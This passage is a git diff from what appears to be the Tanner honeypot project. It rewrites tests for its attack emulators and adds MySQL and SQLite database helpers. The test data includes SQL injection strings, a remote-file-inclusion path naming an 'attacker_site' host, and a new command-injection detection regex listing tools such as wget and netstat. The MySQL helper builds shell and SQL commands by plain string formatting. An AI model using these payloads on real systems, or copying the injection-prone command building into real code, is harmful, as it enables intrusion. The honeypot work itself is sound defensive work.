- self.m_eof = mock.Mock()
- self.m_eof.return_value = (lambda: (yield None))()
-
- def test_make_response(self):
- msg = 'test'
- content = json.loads(self.handler._make_response(msg).decode('utf-8'))
- assert_content = dict(version=1, response=dict(message=msg))
- self.assertDictEqual(content, assert_content)
-
- def test_handle_request_for_dorks(self):
- with mock.patch('aiohttp.Response.write', self.m, create=True):
- with mock.patch('aiohttp.Response.write_eof', self.m_eof, create=True):
- message = mock.Mock()
- message.headers = []
- message.path = '/dorks'
- message.version = (1, 1)
-
- asyncio.get_event_loop().run_until_complete(self.handler.handle_request(message, None))
- content = b''.join([c[1][0] for c in list(self.m.mock_calls)]).decode('utf-8')
- content = json.loads(content)
-
- assert_content = dict(version=1, response=dict(dorks=[x for x in range(10)]))
- self.assertDictEqual(content, assert_content)
-
- def test_handle_request_rfi(self):
- rand = mock.Mock()
- rand.return_value = [x for x in range(10)]
- self.handler.base_handler.emulators['rfi'].handle = mock.Mock(return_value=(lambda: (yield None))())
-
- with mock.patch('aiohttp.Response.write', self.m, create=True):
- with mock.patch('aiohttp.Response.write_eof', self.m_eof, create=True):
- message = mock.Mock()
- message.headers = []
- message.path = '/event'
- message.version = (1, 1)
-
- @asyncio.coroutine
- def foobar():
- return b'{"method":"GET","path":"/vuln_page.php?file=http://attacker_site/malicous_page"}'
-
- payload = mock.Mock()
- payload.read = foobar
-
- asyncio.get_event_loop().run_until_complete(self.handler.handle_request(message, payload))
+ self.serv.session_manager.add_or_update_session = _add_or_update_mock
- content = b''.join([c[1][0] for c in list(self.m.mock_calls)]).decode('utf-8')
- content = json.loads(content)
-
- assert_content = dict(
- version=1,
- response=dict(message=dict(detection=dict(name='rfi', order=2, payload=None), sess_uuid=str(self.test_uuid)))
- )
+ async def choosed(client):
+ return [x for x in range(10)]
- self.assertDictEqual(content, assert_content)
+ dorks = mock.Mock()
+ dorks.choose_dorks = choosed
+ dorks.extract_path = self._make_coroutine()
- def test_hadle_request_index(self):
- rand = mock.Mock()
- rand.return_value = [x for x in range(10)]
+ self.serv.dorks = dorks
- with mock.patch('aiohttp.Response.write', self.m, create=True):
- with mock.patch('aiohttp.Response.write_eof', self.m_eof, create=True):
- message = mock.Mock()
- message.headers = []
- message.path = '/event'
- message.version = (1, 1)
+ super(TestServer, self).setUp()
- @asyncio.coroutine
- def foobar():
- return b'{"method":"GET","path":"/index.html"}'
+ def _make_coroutine(self):
+ async def coroutine(*args, **kwargs):
+ return mock.Mock(*args, **kwargs)
- payload = mock.Mock()
- payload.read = foobar
+ return coroutine
- asyncio.get_event_loop().run_until_complete(self.handler.handle_request(message, payload))
+ def get_app(self):
+ app = self.serv.create_app(loop=self.loop)
+ return app
- content = b''.join([c[1][0] for c in list(self.m.mock_calls)]).decode('utf-8')
- content = json.loads(content)
+ @unittest_run_loop
+ async def test_example(self):
+ request = await self.client.request("GET", "/")
+ assert request.status == 200
+ text = await request.text()
+ assert "Tanner server" in text
- assert_content = dict(
- version=1,
- response=dict(message=dict(detection=dict(name='index', order=1), sess_uuid=str(self.test_uuid)))
- )
+ def test_make_response(self):
+ msg = 'test'
+ content = self.serv._make_response(msg)
+ assert_content = dict(version=1, response=dict(message=msg))
+ self.assertDictEqual(content, assert_content)
- self.assertDictEqual(content, assert_content)
+ @unittest_run_loop
+ async def test_events_request(self):
+ async def _make_handle_coroutine(*args, **kwargs):
+ return {'name': 'index', 'order': 1, "payload": None}
+
+ detection_assert = {'version': 1, 'response': {
+ 'message': {'detection': {'name': 'index', 'order': 1, "payload": None}, 'sess_uuid': str(self.test_uuid)}}}
+ self.serv.base_handler.handle = _make_handle_coroutine
+ request = await self.client.request("POST", "/event", data=b"{\"path\":\"/index.html\"}")
+ assert request.status == 200
+ detection = await request.json()
+ self.assertDictEqual(detection, detection_assert)
+
+ @unittest_run_loop
+ async def test_dorks_request(self):
+ assert_content = dict(version=1, response=dict(dorks=[x for x in range(10)]))
+ request = await self.client.request("GET", "/dorks")
+ assert request.status == 200
+ detection = await request.json()
+ self.assertDictEqual(detection, assert_content)
+
+ @unittest_run_loop
+ async def test_api_request(self):
+ assert_content = {"version": 1, "response": {"message": "tanner api"}}
+ request = await self.client.request("GET", "/api")
+ assert request.status == 200
+ detection = await request.json()
+ self.assertDictEqual(detection, assert_content)
+
+ @unittest_run_loop
+ async def test_stats_api_request(self):
+ async def _make_api_coroutine(*args, **kwargs):
+ return ["1", "2"]
+
+ assert_content = {"version": 1, "response": {"message": ["1", "2"]}}
+ self.serv.api.handle_api_request = _make_api_coroutine
+ request = await self.client.request("GET", "/api/stats")
+ assert request.status == 200
+ detection = await request.json()
+ self.assertDictEqual(detection, assert_content)
diff --git a/tanner/tests/test_session_analyzer.py b/tanner/tests/test_session_analyzer.py
index b5fd3bed..5c37e7f0 100644
--- a/tanner/tests/test_session_analyzer.py
+++ b/tanner/tests/test_session_analyzer.py
@@ -26,39 +26,35 @@
class TestSessionAnalyzer(unittest.TestCase):
def setUp(self):
+ self.loop = asyncio.new_event_loop()
+ asyncio.set_event_loop(None)
self.session = json.loads(session.decode('utf-8'))
- self.handler = SessionAnalyzer()
+ self.handler = SessionAnalyzer(loop=self.loop)
def tests_load_session_fail(self):
- @asyncio.coroutine
- def sess_get():
+ async def sess_get(key):
return asyncio_redis.NotConnectedError
redis_mock = mock.Mock()
redis_mock.get = sess_get
res = None
- loop = asyncio.get_event_loop()
- redis_mock = mock.Mock()
- redis_mock.get = sess_get
- loop.run_until_complete(self.handler.analyze(None, redis_mock))
- self.assertRaises(asyncio_redis.NotConnectedError)
+ with self.assertLogs():
+ self.loop.run_until_complete(self.handler.analyze(None, redis_mock))
def test_create_stats(self):
- @asyncio.coroutine
- def sess_get():
+
+ async def sess_get():
return session
- @asyncio.coroutine
- def set_of_members(key):
+ async def set_of_members(key):
return set()
- @asyncio.coroutine
- def push_list():
+ async def push_list():
return ''
redis_mock = mock.Mock()
redis_mock.get = sess_get
redis_mock.smembers_asset = set_of_members
redis_mock.lpush = push_list
- stats = asyncio.get_event_loop().run_until_complete(self.handler.create_stats(self.session, redis_mock))
+ stats = self.loop.run_until_complete(self.handler.create_stats(self.session, redis_mock))
self.assertEqual(stats['possible_owners'], ['attacker'])
diff --git a/tanner/tests/test_session_manager.py b/tanner/tests/test_session_manager.py
index 49fbc8a8..99f1e9c1 100644
--- a/tanner/tests/test_session_manager.py
+++ b/tanner/tests/test_session_manager.py
@@ -1,3 +1,4 @@
+import asyncio
import unittest
from unittest import mock
@@ -6,7 +7,9 @@
class TestSessions(unittest.TestCase):
def setUp(self):
- self.handler = session_manager.SessionManager()
+ self.loop = asyncio.new_event_loop()
+ asyncio.set_event_loop(None)
+ self.handler = session_manager.SessionManager(loop=self.loop)
self.handler.analyzer = mock.Mock()
self.handler.analyzer.send = mock.Mock()
@@ -86,29 +89,30 @@ def test_validate_missing_cookies(self):
def test_adding_new_session(self):
data = {
- 'peer': {
- },
- 'headers': {},
- 'path': '/foo',
- 'uuid': None,
- 'cookies': {'sess_uuid': None}
- }
- sess = yield from self.handler.add_or_update_session(data)
- assertion_data = {
'peer': {
'ip': None,
'port': None
},
- 'headers': {'user-agent': None},
+ 'headers': {},
'path': '/foo',
'uuid': None,
- 'status': 200,
'cookies': {'sess_uuid': None}
}
- assertion_session = session.Session(assertion_data)
- self.assertEquals(session, assertion_session)
+
+ async def sess_sadd(key, value):
+ return None
+
+ redis_mock = mock.Mock()
+ redis_mock.sadd = sess_sadd
+ sess = self.loop.run_until_complete(self.handler.add_or_update_session(data, redis_mock))
+
+ self.assertEquals([sess], self.handler.sessions)
def test_updating_session(self):
+
+ async def sess_sadd(key, value):
+ return None
+
data = {
'peer': {
'ip': None,
@@ -121,11 +125,22 @@ def test_updating_session(self):
'cookies': {'sess_uuid': None}
}
sess = session.Session(data)
+ data['cookies']['sess_uuid'] = sess.get_uuid()
+ redis_mock = mock.Mock()
+ redis_mock.sadd = sess_sadd
self.handler.sessions.append(sess)
- yield from self.handler.add_or_update_session(data)
+ self.loop.run_until_complete(self.handler.add_or_update_session(data, redis_mock))
self.assertEqual(self.handler.sessions[0].count, 2)
def test_deleting_sessions(self):
+
+ async def analyze(session_key, redis_client):
+ return None
+
+ async def sess_set(key, val):
+ return None
+
+ self.handler.analyzer.analyze = analyze
data = {
'peer': {
'ip': None,
@@ -141,9 +156,9 @@ def test_deleting_sessions(self):
sess.is_expired = mock.MagicMock(name='expired')
sess.is_expired.__bool__.reurned_value = True
self.handler.sessions.append(sess)
- experied = mock.Mock()
- experied.return_value = True
- yield from self.handler.delete_old_sessions()
+ redis_mock = mock.Mock()
+ redis_mock.set = sess_set
+ self.loop.run_until_complete(self.handler.delete_old_sessions(redis_mock))
self.assertListEqual(self.handler.sessions, [])
def test_get_uuid(self):
diff --git a/tanner/tests/test_sqli.py b/tanner/tests/test_sqli.py
index 7e6bcf98..a0ce6a7d 100644
--- a/tanner/tests/test_sqli.py
+++ b/tanner/tests/test_sqli.py
@@ -8,10 +8,9 @@
class SqliTest(unittest.TestCase):
def setUp(self):
- filename = '/tmp/db/test.db'
- os.makedirs(os.path.dirname(filename), exist_ok=True)
- open('/tmp/db/test.db', 'a').close()
-
+ self.loop = asyncio.new_event_loop()
+ asyncio.set_event_loop(None)
+
query_map = {
'users': [{'name':'id', 'type':'INTEGER'}, {'name':'login', 'type':'text'},
{'name':'email', 'type':'text'}, {'name':'username', 'type':'text'},
@@ -19,35 +18,45 @@ def setUp(self):
{'name':'log', 'type':'text'}],
'comments': [{'name':'comment', 'type':'text'}]
}
- self.handler = sqli.SqliEmulator('test.db', '/tmp/')
+ self.handler = sqli.SqliEmulator('test_db', '/tmp/')
self.handler.query_map = query_map
- def test_db_copy(self):
- session = mock.Mock()
- session.sess_uuid.hex = 'ad16014d-9b4a-451d-a6d1-fc8681566458'
- loop = asyncio.get_event_loop()
- loop.run_until_complete(self.handler.create_attacker_db(session))
- self.assertTrue(os.path.exists('/tmp/db/ad16014d-9b4a-451d-a6d1-fc8681566458.db'))
-
def test_map_query_id(self):
query = [('id', '1\'UNION SELECT 1,2,3,4')]
assert_result = 'SELECT * from users WHERE id=1 UNION SELECT 1,2,3,4;'
- loop = asyncio.get_event_loop()
- result = loop.run_until_complete(self.handler.map_query(query))
+ result = self.handler.map_query(query)
self.assertEqual(assert_result, result)
def test_map_query_comments(self):
query = [('comment', 'some_comment" UNION SELECT 1,2 AND "1"="1')]
assert_result = 'SELECT * from comments WHERE comment="some_comment" UNION SELECT 1,2 AND "1"="1";'
- loop = asyncio.get_event_loop()
- result = loop.run_until_complete(self.handler.map_query(query))
+ result = self.handler.map_query(query)
self.assertEqual(assert_result, result)
def test_map_query_error(self):
+ query = [('foo', 'bar\'UNION SELECT 1,2')]
+ result = self.handler.map_query(query)
+ self.assertIsNone(result)
+
+ def test_get_sqli_result(self):
+ query = [('id', '1 UNION SELECT 1,2,3,4')]
+
+ async def mock_execute_query(query, db_name):
+ return [[1, 'name', 'email@mail.com', 'password'], [1, '2', '3', '4']]
+
+ self.handler.sqli_emulator = mock.Mock()
+ self.handler.sqli_emulator.execute_query = mock_execute_query
+
+ assert_result = dict(value="[1, 'name', 'email@mail.com', 'password'] [1, '2', '3', '4']",
+ page='/index.html'
+ )
+ result = self.loop.run_until_complete(self.handler.get_sqli_result(query, 'foo.db'))
+ self.assertEqual(assert_result, result)
+
+ def test_get_sqli_result_error(self):
query = [('foo', 'bar\'UNION SELECT 1,2')]
assert_result = 'You have an error in your SQL syntax; check the manual\
that corresponds to your MySQL server version for the\
right syntax to use near foo at line 1'
- loop = asyncio.get_event_loop()
- result = loop.run_until_complete(self.handler.get_sqli_result(query, 'foo.db'))
- self.assertEqual(assert_result, result)
+ result = self.loop.run_until_complete(self.handler.get_sqli_result(query, 'foo.db'))
+ self.assertEqual(assert_result, result)
\ No newline at end of file
diff --git a/tanner/tests/test_sqlite.py b/tanner/tests/test_sqlite.py
new file mode 100644
index 00000000..da3244c0
--- /dev/null
+++ b/tanner/tests/test_sqlite.py
@@ -0,0 +1,53 @@
+import asyncio
+import os
+import sqlite3
+import unittest
+from unittest import mock
+
+from tanner.emulators import sqlite
+
+class SqliteTest(unittest.TestCase):
+ def setUp(self):
+ self.loop = asyncio.new_event_loop()
+ asyncio.set_event_loop(None)
+ self.filename = '/tmp/db/test_db'
+ os.makedirs(os.path.dirname(self.filename), exist_ok=True)
+ open('/tmp/db/test_db', 'a').close()
+ # Insert some testing data
+ conn = sqlite3.connect(self.filename)
+ self.cursor = conn.cursor()
+ self.cursor.execute('CREATE TABLE test (id INTEGER PRIMARY KEY, username text);')
+ self.cursor.execute('INSERT INTO TEST VALUES(0, "test0")')
+ conn.commit()
+
+ self.handler = sqlite.SQLITEEmulator('test_db', '/tmp/')
+
+ def tearDown(self):
+ if os.path.exists(self.filename):
+ os.remove(self.filename)
+
+ def test_db_copy(self):
+ session = mock.Mock()
+ session.sess_uuid.hex = 'd877339ec415484987b279469167af3d'
+ self.loop.run_until_complete(self.handler.create_attacker_db(session))
+ self.assertTrue(os.path.exists('/tmp/db/attacker_d877339ec415484987b279469167af3d'))
+
+ def test_create_query_map(self):
+ result = self.handler.helper.create_query_map('/tmp/db', 'test_db')
+ assert_result = {'test': [{'name': 'id', 'type': 'INTEGER'}, {'name': 'username', 'type': 'text'}]}
+ self.assertEqual(result, assert_result)
+
+ def test_insert_dummy_data(self):
+ def mock_generate_dummy_data(data_tokens):
+ return [(1, 'test1'), (2, 'test2')], ['I', 'L']
+
+ self.handler.helper.generate_dummy_data = mock_generate_dummy_data
+
+ self.loop.run_until_complete(self.handler.helper.insert_dummy_data('test', 'I,L', self.cursor))
+ assert_result = [[0, 'test0'], [1, 'test1'], [2, 'test2']]
+
+ result = []
+ for row in self.cursor.execute('SELECT * FROM test;'):
+ result.append(list(row))
+
+ self.assertEqual(result, assert_result)
\ No newline at end of file
diff --git a/tanner/tests/test_xss_emulator.py b/tanner/tests/test_xss_emulator.py
index 46bd19fb..fd5eb38f 100644
--- a/tanner/tests/test_xss_emulator.py
+++ b/tanner/tests/test_xss_emulator.py
@@ -1,3 +1,5 @@
+import asyncio
+
import unittest
from unittest import mock
@@ -7,14 +9,16 @@
class TestXSSEmulator(unittest.TestCase):
def setUp(self):
+ self.loop = asyncio.new_event_loop()
+ asyncio.set_event_loop(None)
self.handler = xss.XssEmulator()
def test_post_xss(self):
data = {
'post_data': {'comment': ''}
}
- xss = yield from self.handler.handle(None, None, data)
- assert_result = dict(name='xss', value='',
+ xss = self.loop.run_until_complete(self.handler.handle(None, None, data))
+ assert_result = dict(value='',
page='/index.html')
self.assertDictEqual(xss, assert_result)
@@ -24,15 +28,15 @@ def test_multiple_post_xss(self):
'name': '',
'email': ''}
}
- xss = yield from self.handler.handle(None, None, data)
+ xss = self.loop.run_until_complete(self.handler.handle(None, None, data))
assert_result = ''
self.assertIn(assert_result, xss['value'])
def test_get_xss(self):
path = '/python.php/?foo='
- xss = yield from self.handler.handle(None, path, None)
+ xss = self.loop.run_until_complete(self.handler.handle(path, None, None))
- assert_result = dict(name='xss', value=path,
+ assert_result = dict(value=path,
page='/index.html')
self.assertDictEqual(xss, assert_result)
@@ -40,11 +44,11 @@ def test_set_xss_page(self):
paths = [{'path': '/python.html', 'timestamp': 1465851064.2740946},
{'path': '/python.php/?foo=bar', 'timestamp': 1465851065.2740946},
{'path': '/python.html/?foo=bar', 'timestamp': 1465851065.2740946}]
- with mock.patch('session.Session') as mock_session:
+ with mock.patch('tanner.session.Session') as mock_session:
mock_session.return_value.paths = paths
sess = session.Session(None)
data = {
'post_data': {'comment': ''}
}
- xss = yield from self.handler.handle(sess, None, data)
+ xss = self.loop.run_until_complete(self.handler.handle(None, sess, data))
self.assertEqual(xss['page'], '/python.html')
diff --git a/tanner/utils/base_db_helper.py b/tanner/utils/base_db_helper.py
new file mode 100644
index 00000000..5e39643d
--- /dev/null
+++ b/tanner/utils/base_db_helper.py
@@ -0,0 +1,58 @@
+import asyncio
+import elizabeth
+import json
+import logging
+import random
+
+from tanner.config import TannerConfig
+
+
+class BaseDBHelper:
+ def __init__(self):
+ self.logger = logging.getLogger('tanner.base_db_helper.BaseDBHelper')
+
+ def read_config(self):
+ with open(TannerConfig.get('DATA', 'db_config')) as db_config:
+ try:
+ config = json.load(db_config)
+ except json.JSONDecodeError as json_error:
+ self.logger.info('Failed to load json: %s', json_error)
+ else:
+ return config
+
+ def generate_dummy_data(self, data_tokens):
+ """
+ Insert dummy data based on data tokens
+ I - integer id
+ L - login/username
+ E - email
+ P - password
+ T - piece of text
+ :return:
+ """
+
+ token_list = data_tokens.split(',')
+
+ samples_count = random.randint(100, 1000)
+ inserted_data = []
+ for i in range(samples_count):
+ values = []
+ for token in token_list:
+ if token == 'I':
+ values.append(i)
+ if token == 'L':
+ data = elizabeth.Personal().username()
+ values.append(data)
+ if token == 'E':
+ data = elizabeth.Personal().email()
+ values.append(data)
+ if token == 'P':
+ data = elizabeth.Personal().password()
+ values.append(data)
+ if token == 'T':
+ sample_length = random.randint(1,10)
+ data = elizabeth.Text().text(quantity= sample_length)
+ values.append(data)
+ inserted_data.append(tuple(values))
+
+ return inserted_data, token_list
diff --git a/tanner/utils/mysql_db_helper.py b/tanner/utils/mysql_db_helper.py
new file mode 100644
index 00000000..4ca1aabd
--- /dev/null
+++ b/tanner/utils/mysql_db_helper.py
@@ -0,0 +1,137 @@
+import asyncio
+import json
+import logging
+import subprocess
+import aiomysql
+
+from tanner.config import TannerConfig
+from tanner.utils.base_db_helper import BaseDBHelper
+
+class MySQLDBHelper(BaseDBHelper):
+ def __init__(self):
+ super(MySQLDBHelper, self).__init__()
+ self.logger = logging.getLogger('tanner.db_helper.MySQLDBHelper')
+
+ async def connect_to_db(self):
+ conn = await aiomysql.connect(host = TannerConfig.get('SQLI', 'host'),
+ user = TannerConfig.get('SQLI', 'user'),
+ password = TannerConfig.get('SQLI', 'password')
+ )
+ return conn
+
+ async def check_db_exists(self, db_name, ):
+ conn = await self.connect_to_db()
+ cursor = await conn.cursor()
+ check_DB_exists_query = 'SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA '
+ check_DB_exists_query+= 'WHERE SCHEMA_NAME=\'{db_name}\''.format(db_name=db_name)
+ await cursor.execute(check_DB_exists_query)
+ result = await cursor.fetchall()
+ #return 0 if no such database exists else 1
+ return len(result)
+
+ async def setup_db_from_config(self, name=None):
+ config = self.read_config()
+ if name is not None:
+ db_name = name
+ else:
+ db_name = config['name']
+
+ conn = await self.connect_to_db()
+ cursor = await conn.cursor()
+ create_db_query = 'CREATE DATABASE {db_name}'
+ await cursor.execute(create_db_query.format(db_name=db_name))
+ await cursor.execute('USE {db_name}'.format(db_name=db_name))
+
+ for table in config['tables']:
+ query = table['schema']
+ await cursor.execute(query)
+ await self.insert_dummy_data(table['table_name'], table['data_tokens'], cursor)
+ await conn.commit()
+
+ conn.close()
+
+ async def delete_db(self, db):
+ conn = await self.connect_to_db()
+ cursor = await conn.cursor()
+ delete_db_query = 'DROP DATABASE {db_name}'
+ await cursor.execute(delete_db_query.format(db_name=db))
+ await conn.commit()
+ conn.close()
+
+ async def copy_db(self, user_db, attacker_db):
+ db_exists = await self.check_db_exists(attacker_db)
+ if db_exists:
+ self.logger.info('Attacker db already exists')
+ else:
+ #create new attacker db
+ conn = await self.connect_to_db()
+ cursor = await conn.cursor()
+ await cursor.execute('CREATE DATABASE {db_name}'.format(db_name=attacker_db))
+ conn.close()
+ # copy user db to attacker db
+ dump_db_cmd = 'mysqldump -h {host} -u {user} -p{password} {db_name}'
+ restore_db_cmd = 'mysql -h {host} -u {user} -p{password} {db_name}'
+ dump_db_cmd = dump_db_cmd.format(host = TannerConfig.get('SQLI', 'host'),
+ user = TannerConfig.get('SQLI', 'user'),
+ password = TannerConfig.get('SQLI', 'password'),
+ db_name=user_db
+ )
+ restore_db_cmd = restore_db_cmd.format(host = TannerConfig.get('SQLI', 'host'),
+ user = TannerConfig.get('SQLI', 'user'),
+ password = TannerConfig.get('SQLI', 'password'),
+ db_name=attacker_db
+ )
+ try:
+ dump_db_process = subprocess.Popen(dump_db_cmd, stdout = subprocess.PIPE, shell = True)
+ restore_db_process = subprocess.Popen(restore_db_cmd, stdin = dump_db_process.stdout, shell = True)
+ dump_db_process.stdout.close()
+ dump_db_process.wait()
+ restore_db_process.wait()
+ except subprocess.CalledProcessError as e:
+ self.logger.error('Error during copying sql database : %s' % e)
+ return attacker_db
+
+ async def insert_dummy_data(self, table_name, data_tokens, cursor):
+ inserted_data, token_list = self.generate_dummy_data(data_tokens)
+
+ inserted_string_patt = '%s'
+ if len(token_list) > 1:
+ inserted_string_patt += ','
+ inserted_string_patt *= len(token_list)
+ inserted_string_patt = inserted_string_patt[:-1]
+
+ await cursor.executemany("INSERT INTO " + table_name + " VALUES(" +
+ inserted_string_patt + ")", inserted_data)
+
+ async def create_query_map(self, db_name):
+ query_map = {}
+ tables = []
+ conn = await self.connect_to_db()
+ cursor = await conn.cursor()
+
+ select_tables = 'SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema= \'{db_name}\''
+
+ try:
+ await cursor.execute(select_tables.format(db_name=db_name))
+ result = await cursor.fetchall()
+ for row in result:
+ tables.append(row[0])
+ except Exception as e:
+ self.logger.error('Error during query map creation')
+ else:
+ query_map = dict.fromkeys(tables)
+ for table in tables:
+ query = 'SELECT * FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name= \'{table_name}\' AND table_schema= \'{db_name}\''
+ columns = []
+ try:
+ await cursor.execute(query.format(table_name=table, db_name=db_name))
+ result = await cursor.fetchall()
+ for row in result:
+ if (row[7] == 'int'):
+ columns.append(dict(name=row[3], type='INTEGER'))
+ else:
+ columns.append(dict(name=row[3], type='TEXT'))
+ query_map[table] = columns
+ except :
+ self.logger.error('Error during query map creation')
+ return query_map
\ No newline at end of file
diff --git a/tanner/utils/patterns.py b/tanner/utils/patterns.py
index 56cb15b0..d801ae8d 100644
--- a/tanner/utils/patterns.py
+++ b/tanner/utils/patterns.py
@@ -6,6 +6,7 @@
LFI_ATTACK = re.compile('.*(\/\.\.)*(home|proc|usr|etc)\/.*')
LFI_FILEPATH = re.compile('((\.\.|\/).*)')
XSS_ATTACK = re.compile('.*<(.|\n)*?>')
+CMD_ATTACK = re.compile('.*(alias|cat|cd|cp|echo|exec|find|for|grep|ifconfig|ls|man|mkdir|netstat|ping|ps|pwd|uname|wget|touch|while).*')
REMOTE_FILE_URL = re.compile('(.*(http(s){0,1}|ftp(s){0,1}):.*)')
WORD_PRESS_CONTENT = re.compile('\/wp-content\/.*')
HTML_TAGS = re.compile('.*<(.*)>.*')
diff --git a/tanner/utils/db_helper.py b/tanner/utils/sqlite_db_helper.py
similarity index 54%
rename from tanner/utils/db_helper.py
rename to tanner/utils/sqlite_db_helper.py
index 196d1883..44464ff1 100644
--- a/tanner/utils/db_helper.py
+++ b/tanner/utils/sqlite_db_helper.py
@@ -1,90 +1,32 @@
import asyncio
-import elizabeth
import json
import logging
import os
import random
-import re
import shutil
import sqlite3
from tanner.config import TannerConfig
+from tanner.utils.base_db_helper import BaseDBHelper
-
-class DBHelper:
+class SQLITEDBHelper(BaseDBHelper):
def __init__(self):
- self.logger = logging.getLogger('tanner.db_helper.DBHelper')
-
- @asyncio.coroutine
- def read_config(self, working_dir):
- with open(TannerConfig.get('DATA', 'db_config')) as db_config:
- try:
- config = json.load(db_config)
- except json.JSONDecodeError as json_error:
- self.logger.info('Failed to load json: %s', json_error)
- else:
- return config
-
- @staticmethod
- @asyncio.coroutine
- def insert_dummy_data(table_name, data_tokens, cursor):
- """
- Insert dummy data based on data tokens
- I - integer id
- L - login/username
- E - email
- P - password
- T - piece of text
- :return:
- """
-
- token_list = data_tokens.split(',')
-
- samples_count = random.randint(100, 1000)
- inserted_data = []
- for i in range(samples_count):
- values = []
- for token in token_list:
- if token == 'I':
- values.append(i)
- if token == 'L':
- data = elizabeth.Personal().username()
- values.append(data)
- if token == 'E':
- data = elizabeth.Personal().email()
- values.append(data)
- if token == 'P':
- data = elizabeth.Personal().password()
- values.append(data)
- if token == 'T':
- sample_length = random.randint(1,10)
- data = elizabeth.Text().text(quantity= sample_length)
- values.append(data)
- inserted_data.append(tuple(values))
-
- inserted_string_patt = '?'
- if len(token_list) > 1:
- inserted_string_patt += ','
- inserted_string_patt *= len(token_list)
- inserted_string_patt = inserted_string_patt[:-1]
+ super(SQLITEDBHelper, self).__init__()
+ self.logger = logging.getLogger('tanner.sqlite_db_helper.SQLITEDBHelper')
- cursor.executemany("INSERT INTO " + table_name + " VALUES(" +
- inserted_string_patt + ")", inserted_data)
-
- @asyncio.coroutine
- def setup_db_from_config(self, working_dir, name=None):
- config = yield from self.read_config(working_dir)
+ async def setup_db_from_config(self, working_dir, name=None):
+ config = self.read_config()
if name is not None:
db_name = os.path.join(working_dir, name)
else:
- db_name = os.path.join(working_dir, config['name'] + '.db')
+ db_name = os.path.join(working_dir, config['name'])
conn = sqlite3.connect(db_name)
cursor = conn.cursor()
for table in config['tables']:
query = table['schema']
cursor.execute(query)
- yield from self.insert_dummy_data(table['table_name'], table['data_tokens'], cursor)
+ await self.insert_dummy_data(table['table_name'], table['data_tokens'], cursor)
conn.commit()
conn.close()
@@ -95,7 +37,11 @@ def get_abs_path(path, working_dir):
path = os.path.normpath(os.path.join(working_dir, path))
return path
- @asyncio.coroutine
+ @staticmethod
+ def delete_db(db):
+ if db is not None and os.path.exists(db):
+ os.remove(db)
+
def copy_db(self, src, dst, working_dir):
src = self.get_abs_path(src, working_dir)
dst = self.get_abs_path(dst, working_dir)
@@ -105,7 +51,18 @@ def copy_db(self, src, dst, working_dir):
shutil.copy(src, dst)
return dst
- @asyncio.coroutine
+ async def insert_dummy_data(self, table_name, data_tokens, cursor):
+ inserted_data, token_list = self.generate_dummy_data(data_tokens)
+
+ inserted_string_patt = '?'
+ if len(token_list) > 1:
+ inserted_string_patt += ','
+ inserted_string_patt *= len(token_list)
+ inserted_string_patt = inserted_string_patt[:-1]
+
+ cursor.executemany("INSERT INTO " + table_name + " VALUES(" +
+ inserted_string_patt + ")", inserted_data)
+
def create_query_map(self, working_dir, db_name, ):
query_map = {}
tables = []